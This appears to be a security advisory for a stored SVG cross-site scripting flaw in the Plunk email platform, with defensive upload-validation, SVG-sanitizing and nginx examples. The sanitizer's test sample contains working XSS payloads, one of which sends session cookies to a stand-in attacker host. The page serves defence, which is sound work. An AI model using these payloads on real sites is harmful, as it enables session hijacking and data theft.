CVE-2026-32095 Overview
CVE-2026-32095 is a stored Cross-Site Scripting (XSS) vulnerability in Plunk, an open-source email platform built on top of AWS SES. Prior to version 0.7.1, Plunk's image upload endpoint accepted SVG files without sanitization. An SVG is an XML document, and a browser that opens one as a document (rather than as the source of an img element) executes any JavaScript it contains, so an attacker could upload an SVG carrying a script that runs in the context of other users' sessions.
Critical Impact
Attackers can upload malicious SVG files to execute arbitrary JavaScript in victims' browsers, potentially stealing session tokens, performing actions on behalf of users, or compromising sensitive email platform data.
Affected Products
- Plunk versions prior to 0.7.1
- Open-source deployments using the vulnerable image upload endpoint
- Self-hosted Plunk instances with unrestricted SVG file uploads
Discovery Timeline
- 2026-03-11 - CVE CVE-2026-32095 published to NVD
- 2026-03-12 - Last updated in NVD database
Technical Details for CVE-2026-32095
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) occurs due to insufficient validation of uploaded file types in the image upload functionality. The vulnerability allows authenticated users to upload SVG files through the image upload endpoint. SVG (Scalable Vector Graphics) files are XML-based and can contain embedded <script> tags or event handlers that execute JavaScript when the file is rendered in a browser.
When a malicious SVG is uploaded and later opened by another user as a document, for example by navigating to the uploaded file's URL or when the file is embedded with an iframe, object or embed element (the page mentions email previews and user avatars as such places), the embedded JavaScript executes. If the file is served from the application's origin, the script runs in Plunk's security context and can read authentication cookies that are not HttpOnly, call the API with the victim's session, modify page content or redirect the user to a malicious site. An SVG displayed through an img element or as a CSS background does not run scripts, so the exposure depends on how the platform serves and embeds uploads.
The vulnerability requires low privileges (an authenticated user who can upload images) and user interaction (the victim must open the malicious file); because the payload is stored on the server, a single upload can affect every user who later views it.
Root Cause
The root cause is improper validation of uploaded files in the upload handler: Plunk accepted SVG uploads as if they were ordinary raster images, although an SVG is an XML document that can carry <script> elements, event handler attributes and javascript: references. A file's extension and client-declared Content-Type are attacker-controlled, so validation has to look at the bytes themselves. Mitigation means either rejecting SVG uploads outright, or parsing and sanitizing the SVG to remove every scripting capability before it is stored and then serving it with headers that keep the browser from rendering it as a document (Content-Disposition: attachment, plus a Content-Security-Policy on that response). A CSP on the application's own pages does not help, because the script runs when the SVG is opened at its own URL, where only the headers of that response apply.
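The check described above, as an added example that is not Plunk's code and not the fix shipped in 0.7.1: the decision rests on the uploaded bytes, never on the filename or the declared Content-Type. The allow-list of raster formats, the size limit and the function names are assumptions for the example, and the sample uploads are constructed.

```python
"""Added example, not Plunk's code and not the 0.7.1 fix: accept an uploaded
image only when its own bytes match an allow-listed raster format. The
filename and client-declared Content-Type are reported but never trusted.
Allow-list, size limit and function names are assumptions for the example."""
from __future__ import annotations

import xml.etree.ElementTree as ET

MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed size limit

# Leading bytes (magic numbers) of the raster formats this allow-list accepts.
RASTER_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sniff_raster_type(data: bytes) -> str | None:
    """Return the MIME type implied by the file's own bytes, or None."""
    for magic, mime in RASTER_MAGIC.items():
        if data.startswith(magic):
            return mime
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":  # RIFF container, WEBP form
        return "image/webp"
    return None


def looks_like_svg(data: bytes) -> bool:
    """True when the head of the file parses as XML with an <svg> root.

    Only the first 4 KiB is fed to a pull parser and classification stops at
    the first start tag, so a hostile document is never expanded in full.
    (On Expat older than 2.4.1, parse untrusted XML with defusedxml instead.)
    """
    parser = ET.XMLPullParser(events=("start",))
    try:
        parser.feed(data[:4096])
        for _event, element in parser.read_events():
            # Root tag with or without the SVG namespace prefix
            return element.tag.rsplit("}", 1)[-1] == "svg"
    except ET.ParseError:  # not XML at all, or malformed
        return False
    return False


def validate_upload(filename: str, declared_type: str, data: bytes) -> tuple[bool, str]:
    """Decide whether to store an upload. Returns (accepted, detail)."""
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file exceeds size limit"
    real_type = sniff_raster_type(data)
    if real_type is not None:
        # Store it and serve it with the sniffed type, not the declared one
        return True, real_type
    if looks_like_svg(data):
        return False, f"SVG rejected (declared {declared_type}, name {filename})"
    return False, "unrecognised file content"


# Constructed sample uploads for the example (not files from the advisory).
SAMPLES = [
    ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32),
    # An SVG payload disguised by filename and declared type
    ("avatar.png", "image/png",
     b'<?xml version="1.0"?>\n<svg xmlns="http://www.w3.org/2000/svg" '
     b'onload="alert(document.cookie)"></svg>'),
    ("notes.txt", "image/jpeg", b"just text"),
]

if __name__ == "__main__":
    for name, declared, payload in SAMPLES:
        print(name, validate_upload(name, declared, payload))
```

The allow-list deliberately treats anything it cannot identify as a rejection; the SVG classifier only exists to give a clearer reason, so a file that hides its root element behind a very long comment or DOCTYPE is still refused.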
Attack Vector
The attack is network-based and requires an authenticated attacker to upload a specially crafted SVG file through the image upload endpoint. The malicious file is stored on the server and served to other users who view the content, triggering the XSS payload in their browsers. This creates a persistent attack vector that can affect multiple victims without further attacker interaction.
The payload is an SVG file carrying JavaScript: typically a <script> element, an event handler attribute such as onload or onerror, or a javascript: URL in an href or xlink:href attribute (a <foreignObject> element can also wrap arbitrary HTML). When the platform serves the file and a browser opens it as a document, the script runs. For technical details, refer to the GitHub Security Advisory.
Detection Methods for CVE-2026-32095
Indicators of Compromise
- Presence of SVG files in upload directories containing <script> tags or JavaScript event handlers
- Unusual JavaScript execution originating from SVG file requests in browser console logs
- User reports of unexpected browser behavior when viewing uploaded images
- HTTP access logs showing repeated requests to uploaded SVG files from multiple user sessions
Detection Strategies
- Implement file content inspection that parses uploaded SVG as XML and flags <script> and <foreignObject> elements, on* event handler attributes and javascript: URLs in href/xlink:href (matching the raw text with a regex misses case variants and XML entity encoding)
- Deploy web application firewall (WAF) rules to block SVG uploads or inspect their content for malicious patterns
- Monitor server logs for uploads with .svg extensions or image/svg+xml content types, treating both as hints only, since the client chooses the filename and the declared type
- Utilize SentinelOne Singularity XDR to detect and alert on anomalous script execution patterns originating from file upload contexts
Monitoring Recommendations
- Enable detailed logging on file upload endpoints to capture file types, sizes, and content hashes
- Configure browser-side Content Security Policy violation reporting to detect XSS attempts
- Set up alerting for any SVG file uploads to the image endpoint pending security review
- Monitor for session anomalies that may indicate session hijacking following XSS exploitation
How to Mitigate CVE-2026-32095
Immediate Actions Required
- Upgrade Plunk to version 0.7.1 or later immediately
- Audit existing uploaded files for malicious SVG content and remove any containing JavaScript
- Send a strict Content-Security-Policy on the responses that serve uploaded files; the application's page-level CSP does not apply to an SVG opened at its own URL
- Consider temporarily disabling SVG uploads until the patch is applied
Patch Information
This vulnerability is fixed in Plunk version 0.7.1. Organizations should update to this version or later to remediate the stored XSS vulnerability. The fix addresses the file upload validation to properly handle SVG files. For detailed patch information, see the GitHub Security Advisory.
Workarounds
- Reject SVG uploads before they are stored, deciding on the file's bytes (an XML document with an <svg> root) rather than on the extension or client-declared content type; a reverse proxy rule that matches image/svg+xml in the request Content-Type header only catches raw bodies, not multipart/form-data uploads, whose part type travels inside the body
- Implement server-side SVG sanitization that parses the XML and strips <script> and <foreignObject> elements, on* event handler attributes and javascript: or data: URLs in href/xlink:href before storing the file
- Serve stored SVG files with Content-Disposition: attachment and X-Content-Type-Options: nosniff so they download instead of rendering inline; the script in an SVG runs only when the browser opens it as a document (direct navigation, iframe, object or embed), not when it is shown through an img element
- Send a Content-Security-Policy on the responses that serve uploaded files (for example default-src 'none'; sandbox); a policy on the application's own pages does not govern an SVG opened at its own URL
# Example nginx configuration (reverse proxy in front of Plunk). The
# /api/upload and /uploads/ paths and the plunk_backend upstream are assumed.
location /api/upload {
    # Catches only a raw body sent as image/svg+xml. A multipart/form-data
    # upload carries the part's type inside the body, invisible here, so the
    # application must still reject SVG by inspecting the uploaded bytes.
    if ($http_content_type ~* "image/svg") {
        return 403;
    }
    proxy_pass http://plunk_backend;
}
# Harden responses that serve stored SVG files. The headers must be on the
# file's own response; a CSP on the application pages does not govern an
# SVG opened at its own URL.
location ~* ^/uploads/.*\.svg$ {
    add_header Content-Disposition "attachment" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header Content-Security-Policy "default-src 'none'; sandbox" always;
    proxy_pass http://plunk_backend;
}
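One scanner and sanitizer that serves the payload shapes listed under Attack Vector, the content-inspection rule under Detection Strategies, the audit of existing uploads under Immediate Actions and the server-side sanitization workaround above, as an added example that is not Plunk's code. Both SVG documents are constructed for the example and the function names are assumptions; it parses the XML instead of pattern-matching the raw text.

```python
"""Added example, not Plunk's code: find the script-capable constructs an SVG
can carry (detection / audit) and strip them (sanitization). Sample documents
are constructed for the example; function names are assumptions."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Attributes that hold a URL the browser may navigate to or load.
URL_ATTRS = {"href", f"{{{XLINK_NS}}}href"}
# Schemes that turn a reference into executable or embedded content.
UNSAFE_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)
# Elements that carry script or foreign (HTML) content outright.
SCRIPT_ELEMENTS = {"script", "foreignobject"}


def local_name(qualified: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qualified.rsplit("}", 1)[-1]


def element_reasons(el: ET.Element) -> list[str]:
    """Why this element must go: script/foreign content, or an animation that
    rewrites an href at runtime (<set>/<animate> targeting href)."""
    name = local_name(el.tag)
    if name.lower() in SCRIPT_ELEMENTS:
        return [f"<{name}> element"]
    target = local_name(el.get("attributeName", ""))
    if name.lower() in ("set", "animate") and target in ("href", "xlink:href"):
        return [f"<{name}> retargets href"]
    return []


def attribute_reasons(el: ET.Element) -> list[str]:
    """Dangerous attributes on one element: on* handlers and unsafe URLs."""
    reasons = []
    for attr, value in el.attrib.items():
        name = local_name(attr)
        if name.lower().startswith("on"):
            reasons.append(f"event handler {name}")
        elif attr in URL_ATTRS and UNSAFE_SCHEME.match(value):
            scheme = value.split(":", 1)[0].strip().lower()
            reasons.append(f"{name} uses {scheme}: scheme")
    return reasons


def scan_svg(data: bytes) -> list[str]:
    """Detection rule for an upload audit: every finding, in document order."""
    root = ET.fromstring(data)  # on Expat < 2.4.1 use defusedxml for untrusted XML
    return [r for el in root.iter() for r in element_reasons(el) + attribute_reasons(el)]


def sanitize_svg(data: bytes) -> bytes:
    """Return the document with script-capable elements and attributes removed."""
    root = ET.fromstring(data)
    for parent in list(root.iter()):          # snapshot: the tree is edited below
        for child in list(parent):
            if element_reasons(child):
                parent.remove(child)          # drops the whole subtree
    for el in root.iter():
        for attr in list(el.attrib):
            unsafe_url = attr in URL_ATTRS and UNSAFE_SCHEME.match(el.attrib[attr])
            if local_name(attr).lower().startswith("on") or unsafe_url:
                del el.attrib[attr]
    ET.register_namespace("", SVG_NS)         # serialise the root as plain <svg xmlns=...>
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


# Constructed samples (not files from the advisory).
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="fetch('https://attacker.example/?c='+document.cookie)">
  <circle cx="50" cy="50" r="40" fill="tomato"/>
  <script>alert(document.domain)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">click</text></a>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(2)"/></body></foreignObject>
  <set attributeName="href" to="javascript:alert(3)"/>
</svg>
"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><rect width="10" height="10" fill="#09f"/></svg>'

if __name__ == "__main__":
    for finding in scan_svg(MALICIOUS_SVG):
        print("finding:", finding)
    print(sanitize_svg(MALICIOUS_SVG).decode())
```

Parsing before matching is the point: an attacker can write the handler as onLoad, split javascript: across entity references, or hide the script in a foreignObject, and a regex over the raw bytes sees none of that, while the parsed tree exposes each construct by its local name and decoded attribute value. Rejecting SVG outright, as the workarounds above suggest, remains the simpler option when the platform does not need it.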
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.